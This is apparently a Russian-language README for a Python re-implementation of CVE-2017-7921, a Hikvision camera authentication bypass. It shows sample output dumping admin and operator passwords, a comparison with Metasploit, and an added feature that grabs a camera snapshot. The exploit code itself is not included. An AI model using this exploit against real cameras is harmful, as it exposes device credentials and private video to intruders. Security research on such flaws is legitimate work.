
простой переписанный на Python CVE-2017-7921 от меня. только в образовательных целях!
Простая реализация CVE-2017-7921 на Python от меня. Только для образовательных целей!
Довольно просто, я не включил проверки для таких вещей, как IP-адреса, и расширенные проверки ответа и тому подобное. Я тестировал его на камере, на которой мне разрешено тестировать (в моей локальной сети), и, похоже, он работает отлично.
#Пример вывода:
python 2017.py
found usernames: admin,defualt
admin:Pa$$W0rd
defualt:Xf07732479
Это совпадает с учетными данными, которые мы получим, если используем тот же эксплойт в "msfconsole"
[*] User Credentials Information:
-----------------------------
User:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
User:defualt | ID:2 | Role:Operator | Password: Xf07732479
#Источники Подробности: https://medium.com/@k3yb0ard/when-you-pay-to-sell-your-own-privacy-a-technical-deep-dive-into-cve-2017-7921-hikvision-auth-576b581f4afe
CVE: https://nvd.nist.gov/vuln/detail/cve-2017-7921
#Обновление
Также добавлена функция snapshot, которая позволяет получить снимок из /Streaming/channels/1/picture и сохранить его в файл ip.jpg